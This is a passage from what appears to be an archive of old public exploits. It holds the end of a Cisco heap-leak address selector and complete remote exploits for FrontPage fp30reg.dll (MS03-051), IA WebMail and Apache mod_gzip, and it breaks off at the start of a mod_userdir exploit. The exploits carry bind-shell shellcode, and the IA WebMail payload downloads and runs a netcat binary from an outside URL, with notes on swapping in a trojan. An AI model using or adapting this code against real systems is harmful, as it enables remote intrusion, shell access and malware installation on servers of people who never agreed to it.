if (cfg.verbose) printf("Assigning as block3_next_val\n");
block3_next_val=p_next;
}
state++;
p+=4;
break;
case ST_PREV:
p_prev=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tPREV Block : %08X\n",p_prev);
state++;
p+=4;
break;
case ST_SIZE:
if (cfg.verbose)
printf("\tBlock Size : %8u words",
ntohl(*(unsigned int *)p)&0x7FFFFFFF);
if (ntohl(*(unsigned int *)p)&0x80000000) {
if (cfg.verbose)
printf(" (Block in use)\n");
} else {
if (cfg.verbose)
printf(" (Block NOT in use)\n");
}
state++;
p+=4;
break;
case ST_REF:
if (cfg.verbose)
printf("\tReferences : %8u\n",ntohl(*(unsigned int *)p));
state++;
p+=4;
break;
case ST_LASTDE:
if (cfg.verbose)
printf("\tLast DeAlc : %08X\n",ntohl(*(unsigned int *)p));
state=ST_ID_ME_NOW;
p+=4;
break;
//
// Identification
//
case ST_ID_ME_NOW:
i=0;
while ((leak.guess==-1)&&(cisco_boxes[i].name!=NULL)) {
if (
(p_name>=cisco_boxes[i].PC_start) &&
(p_name<=cisco_boxes[i].PC_end) &&
(p_pc>=cisco_boxes[i].PC_start) &&
(p_pc<=cisco_boxes[i].PC_end) &&
(p_next>=cisco_boxes[i].IO_start) &&
(p_next<=cisco_boxes[i].IO_end) &&
(p_prev>=cisco_boxes[i].IO_start) &&
(p_prev<=cisco_boxes[i].IO_end)
) {
leak.guess=i;
break;
}
i++;
}
state=0;
p+=4;
break;
default:
p+=1;
}
}
if ( (opcode_begin!=NULL) && (block2_next_field!=NULL) && (block3_next_val!=0) ) {
unsigned int delta;
unsigned int a;
unsigned int i;
int flag=0;
delta=(unsigned int)((void*)block2_next_field - (void*)opcode_begin);
a=block3_next_val-delta;
if (cfg.verbose) {
printf("\n");
printf("Delta between opcode_begin (%p) "
"and block2_next_field (%p) is %u\n",
(void*)block2_next_field, (void*)opcode_begin, delta);
printf("The third block is at 0x%08X\n", block3_next_val);
printf("Therefore, the code should be located at 0x%08X\n",a);
}
for (i=0;i<leak.addrc;i++) {
if (leak.addrs[i].a==a) {
leak.addrs[i].count++;
flag++;
break;
}
}
if ((flag==0)&&(leak.addrc<MAXADDRS-1)) {
leak.addrs[leak.addrc++].a=a;
leak.addrs[leak.addrc].count=1;
leak.lastaddr=a;
}
}
}
unsigned int SelectAddress(void) {
unsigned int the_address;
int rnd_addr;
unsigned int i,j;
addrs_t atmp;
addrs_t consider[MAXADDRS];
unsigned int consc=0;
if (leak.addrc==0) {
fprintf(stderr,"ERROR: No addresses available. Unable to recover\n");
return 0;
}
for (i=0;i<leak.addrc;i++)
printf(" Address 0x%08X (%u times)\n",
leak.addrs[i].a,
leak.addrs[i].count);
//
// put addresses to consider in another array.
// We only want those above our threshold, to prevent irregular buffers
//
memset(&consider,0,sizeof(consider));
for (i=0;i<leak.addrc;i++) {
if (leak.addrs[i].count<LOW_COUNT_THR) {
printf("Address 0x%08X count below threshold\n",
leak.addrs[i].a);
continue;
}
consider[consc]=leak.addrs[i];
consc++;
}
//
// bubble sort addresses, unless we are operating count based, where we
// sort by times of appearences
//
if (cfg.strategy != S_FREQUENT) {
for (i=0;i<consc-1;i++) {
for (j=0;j<(consc-1-i);j++) {
if (consider[j+1].a < consider[j].a) {
atmp=consider[j];
consider[j] = consider[j+1];
consider[j+1] = atmp;
}
}
}
} else {
for (i=0;i<consc-1;i++) {
for (j=0;j<(consc-1-i);j++) {
if (consider[j+1].count < consider[j].count) {
atmp=consider[j];
consider[j] = consider[j+1];
consider[j+1] = atmp;
}
}
}
}
printf("Cleaned up, remaining addresses %u\n",consc);
if (consc==0) {
fprintf(stderr,"ERROR: No addresses left. Unable to recover\n"
"You can try to decrease LOW_COUNT_THR in the source\n");
return 0;
}
for (i=0;i<consc;i++)
printf(" Address 0x%08X (%u times)\n",
consider[i].a,
consider[i].count);
switch (cfg.strategy) {
case S_RANDOM:
{
srand((unsigned long)time(NULL));
rnd_addr=(int)(((float)consc-1)*rand()/(RAND_MAX+1.0));
the_address=consider[rnd_addr].a + leak.nop_offset;
printf("Use pseudo-randomly selected address 0x%08X (0x%08X)\n",
the_address,consider[rnd_addr].a);
}
break;
case S_LAST:
{
the_address=leak.lastaddr + leak.nop_offset;
printf("Using last address 0x%08X\n",the_address);
}
break;
case S_SMALLEST:
{
if (consc==1) {
the_address= consider[0].a + leak.nop_offset;
printf("Using smallest address 0x%08X (0x%08X)\n",
the_address,consider[0].a);
} else if (consc==2) {
the_address= consider[1].a + leak.nop_offset;
printf("Using second smallest address 0x%08X (0x%08X)\n",
the_address,consider[1].a);
} else {
the_address= consider[2].a + leak.nop_offset;
printf("Using third smallest address 0x%08X (0x%08X)\n",
the_address,consider[2].a);
}
}
break;
case S_HIGHEST:
{
the_address= consider[consc-1].a + leak.nop_offset;
printf("Using highest address 0x%08X (0x%08X)\n",
the_address,consider[consc-1].a);
}
break;
case S_FREQUENT:
{
// already sorted by frequency
the_address= consider[consc-1].a + leak.nop_offset;
printf("Using most frequent address 0x%08X (0x%08X)\n",
the_address,consider[consc-1].a);
}
break;
default:
fprintf(stderr,"ERROR: unknown address strategy selected\n");
return (0);
}
return the_address;
}
// [2003-08-10]
80 MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)
/************************************************** *****************************
Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore
Exploit by Adik netmaniac hotmail kg
Binds persistent command shell on port 9999
Tested on
Windows 2000 Professional SP3 English version
(fp30reg.dll ver 4.0.2.5526)
-[ 13/Nov/2003 ]-
************************************************** ******************************/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")
#define VER "0.1"
/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};
void cmdshell (int sock);
long gimmeip(char *hostname);
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
struct hostent *host;
int sockTCP,s;
unsigned short port = 80;
long ip;
unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
unsigned char packet[3000],data[1500];
unsigned char ecx[] = "\xe0\xf3\xd4\x67";
unsigned char edi[] = "\xff\xd0\x90\x90";
unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll
unsigned char shortjmp[] = "\xeb\x10";
printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
" by Adik < netmaniac [at] hotmail.KG >\n\n", VER);
if(argc < 2)
{
printf(" Usage: %s [Target] <port>\n"
" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
return 1;
}
if(argc==3)
port = atoi(argv[2]);
WSAStartup(0x0202, &wsaData);
printf(" Target:\t%s \tPort: %d\n\n",argv[1],port);
ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(packet,0,sizeof(packet));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);
memset(data, 0x90, sizeof(data)-1);
data[sizeof(data)-1] = '\x0';
memcpy(&data[16],edi,sizeof(edi)-1);
memcpy(&data[20],ecx,sizeof(ecx)-1);
memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
memcpy(&data[250+14],call,sizeof(call)-1);
memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf(" Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf(" Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf(" Checking for presence of fp30reg.dll...");
if (send(sockTCP, packet, strlen(packet),0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
memset(packet,0,sizeof(packet));
if (recv(sockTCP, packet, sizeof(packet),0) == -1)
{
printf("[x] Failed to receive packet! Exiting...\n");
WSACleanup();
return 1;
}
if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
printf(" Found!\n");
else
{
printf(" Not Found!! Exiting...\n");
WSACleanup();
return 1;
}
printf(" Packet injected!\n");
closesocket(sockTCP);
printf(" Sleeping ");
for(s=0;s<13000;s+=1000)
{
printf(". ");
Sleep(1000);
}
printf("\n Connecting to host: %s on port 9999",argv[1]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(9999);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
WSACleanup();
exit(1);
}
printf("\n Dropping to shell...\n\n");
cmdshell(sockTCP);
return 0;
}
/************************************************** *******************************/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];
tv.tv_sec = 1;
tv.tv_usec = 0;
while (1)
{
o[0] = 1;
o[1] = sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
}
}
}
/************************************************** *******************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/************************************************** *******************************/
// [2003-11-13]
80 IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
# - www elitehaven net/ncat.exe (downloaded)
# - c:\nc.exe (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
# - WebMailsvr.exe exits without consuming 100% resources in most
# cases.
# - This has only been tested with IA WebMail 3.1, however it was
# designed to exploit all versions.
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}
$shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
"\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
"\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
"\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
"\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
"\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
"\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
"\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
"\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
"\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
"\xFF\x36\x50\xFF\x15\x14\x52\x02" .
"\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
"\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
"\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
"\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
"\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
"\x15\x14\x52\x02\x10\x5A\x52\x31" .
"\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
"\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
"\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
"\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
"\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
"\x46\x69\x6C\x65\x41\xFF\x57\x69" .
"\x6E\x45\x78\x65\x63\xFF\x68\x74" .
"\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
"\x2E\x65\x6C\x69\x74\x65\x68\x61" .
"\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
"\x6E\x63\x61\x74\x2E\x65\x78\x65" .
"\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
"\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
"\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";
print $victim $exploit;
print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
sleep(5);
print "Done.\n";
close($victim);
exit;
########################################
## SHELLCODE #
########################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [[email protected]]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h] ; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h] ; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
################################################## ###################
# [2003-11-19]
80 Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
/*
\ [exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
\ Created by xCrZx crazy_einstein yahoo com /05.06.03/
/
\ Tested on RedHat 8.0 (Psyche) (here is target for it),
/ also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/
\
*/
/*
\
/ Single mode:
\
/ [crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
\
/ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
\ by xCrZx [[email protected]] /05.06.03/
/
\ Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/
\ [!] Connecting to localhost:80
/ [+] Connected!
\ Trying to connect to localhost:2003 port!!! Pray for success!
/ Sleeping at 2 seconds...
\
/ [!] Shell is accessible!
\
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
\ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
\ Brute mode:
/
\ [crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
\ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/ by xCrZx [[email protected]] /05.06.03/
\
/ Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000
\
/ [~] Brutemode activated!
\ .
/ [!] Shell is accessible!
\
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
\ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
\
*/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define STEP 1000
char fmt[] =
"POST /?%s HTTP/1.1\r\n"
"Content-Type: text/html\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Accept-Encoding: gzip, deflate\r\n\r\n"
"%s\r\n\r\n";
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 8.0 (Psyche)", // disributive info
0xbfffd8f0, // return address in stack
0x42127480, // address of stderr
//shellcode for Linux x86 -> bind shell on 2003 port//
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x 8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x 89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x 14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x 0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\x cd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x b0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x 68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80",
/*
special jump instruction (to avoid bad characters in url):
(jump on our shellcode into heap)
movl $0xa1a51baa,%ebx
addl $0x66666666,%ebx
jmp *%ebx
*/
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\x e3"
} };
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
void usage(char *prog) {
int i=0;
printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr]
[-b addr] [-s step_num]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);
}
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");
for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}
if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
jmp=targets[trg].jmp;
printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %d\n",step);
printf("\n");
if(brutemode)printf("[~] Brutemode activated!\n");
do {
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);
if(!brutemode)printf("\n[!] Connecting to %s:%d\n",victim,port);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
if(!brutemode)printf("[+] Connected!\n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;
memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcod e));
sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
write(sock,tmp,strlen(tmp));
}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
close(sock);
ret-= step;
if(brutemode) {printf(".");fflush(stdout);}
if(!brutemode) {
printf(" Trying to connect to %s:%d port!!! Pray for success!\n",victim,shellport);
printf(" Sleeping at 2 seconds...\n");
}
sleep(2);
sock=socket(PF_INET,SOCK_STREAM,0);
bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_ze ro));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("\n[!] Shell is accessible!\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");
close(sock);
} while ( brutemode );
return 0;
}
// [2003-11-20]
80 Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit
/* m00-apache-w00t.c
*
